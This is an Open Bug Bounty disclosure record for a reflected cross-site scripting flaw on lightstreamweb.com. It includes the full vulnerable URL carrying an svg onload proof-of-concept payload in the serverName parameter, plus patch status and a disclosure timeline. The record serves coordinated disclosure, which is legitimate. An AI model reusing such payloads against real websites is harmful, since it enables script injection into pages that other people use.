lightstreamweb.com XSS vulnerability

2016-01-09T12:26:00
ID OBB:122876
Type openbugbounty
Reporter Spam404
Modified 2017-07-26T12:13:00

Description

Vulnerable URL:
http://lightstreamweb.com/_advanced_site/slideshow/146slideshow.php?serverName=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E&client;_id=175&slideshowFolder;=art_large&bgColorForSlideshow;=ffffff&rand;_image1=classic_car_31.jpg&rand;_image2=classic_car_28.jpg&rand;_image3=classic_car_14.jpg&rand;_image4=classic_car_17.jpg&bgColorForSlideshow;=ffffff&rand;_pic1=20752&rand;_pic2=20749&rand;_pic3=20569&rand;_pic4=20572&slideshow;_id=152
Details:

Description| Value
---|---
Patched:| Yes, at 26.07.2017
Latest check for patch:| 26.07.2017 12:13 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 3989273
Google Pagerank| 0
VIP website status:| No
Check lightstreamweb.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 9 January, 2016 12:26 GMT
Vulnerability existence verified and confirmed| 9 January, 2016 12:28 GMT
Vulnerability details disclosed by researcher| 2 April, 2016 13:11 GMT
Vulnerability patched by the website owner| 26 July, 2017 12:13 GMT